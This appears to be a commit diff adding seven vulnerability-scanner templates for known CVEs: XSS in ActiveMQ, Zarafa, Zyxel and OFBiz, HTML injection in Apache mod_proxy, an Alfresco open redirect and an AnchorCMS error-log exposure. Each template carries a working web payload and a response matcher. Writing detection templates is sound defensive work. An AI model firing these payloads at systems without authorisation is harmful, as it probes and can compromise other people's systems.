more cves 🔥

cves/2018/CVE-2018-7251.yaml

@@ -0,0 +1,18 @@
+id: CVE-2018-7251
+
+info:
+  name: AnchorCMS Error Log Exposure
+  author: Ice3man
+  severity: medium
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/anchor/errors.log'
+    matchers:
+      - type: word
+        words:
+          - '"date":'
+          - '"message":'
+          - '"trace":['
+        condition: and

cves/2018/CVE-2018-8006.yaml

@@ -0,0 +1,20 @@
+id: CVE-2018-8006
+
+info:
+  name: Apache ActiveMQ XSS
+  author: Ice3man
+  severity: medium
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/admin/queues.jsp?QueueFilter=yu1ey%22%3e%3cscript%3ealert(%221%22)%3c%2fscript%3eqb68'
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '"><script>alert("1")</script>'
+      - type: word
+        words:
+          - "/html"
+        part: header

cves/2019/CVE-2019-10092.yaml

@@ -0,0 +1,15 @@
+id: CVE-2019-10092
+
+info:
+  name: Apache mod_proxy HTML Injection / Partial XSS
+  author: Ice3man
+  severity: medium
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/%5cgoogle.com/evil.html'
+    matchers:
+      - type: word
+        words:
+          - "<a href=\"/\\google.com/evil.html\">"

cves/2019/CVE-2019-14223.yaml

@@ -0,0 +1,18 @@
+id: CVE-2019-14223
+info:
+  name: Alfresco Share Open Redirect
+  author: Ice3man
+  severity: low
+
+requests:
+  - method: POST
+    path:
+      - '{{BaseURL}}/share/page/dologin'
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+    body: success=%2Fshare%2Fpage%2F&failure=:\\google.com&username=baduser&password=badpass
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "(?m)^(?:Location\\s*:\\s*)(?:https?://|//|\\\\)?(?:[a-zA-Z0-9\\-_]*\\.)?google\\.com(?:\\s*)$"

cves/2019/CVE-2019-7219.yaml

@@ -0,0 +1,22 @@
+id: CVE-2019-7219
+
+info:
+  name: Zarafa WebApp Reflected XSS
+  author: Ice3man
+  severity: low
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/webapp/?fccc0\"><script>alert(1)</script>5f43d=1"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "\"><script>alert(1)</script>"
+      - type: word
+        part: header
+        words:
+          - "/html"

cves/2019/CVE-2019-9955.yaml

@@ -0,0 +1,18 @@
+id: CVE-2019-9955
+
+info:
+  name: CVE-2019-9955 Zyxel XSS
+  author: Ice3man
+  severity: low
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/?mobile=1&mp_idx=%22;alert(%271%27);//"
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "\";alert('1');//"
+          - "<title>Welcome</title>"
+        condition: and

cves/2020/CVE-2020-1943.yaml

@@ -0,0 +1,22 @@
+id: CVE-2020-1943
+
+info:
+  name: Apache OFBiz Reflected XSS
+  author: Ice3man
+  severity: medium
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/control/stream?contentId=<svg/onload=alert(1)>'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<svg/onload=alert(1)>"
+        part: body
+      - type: word
+        words:
+          - "/html"
+        part: header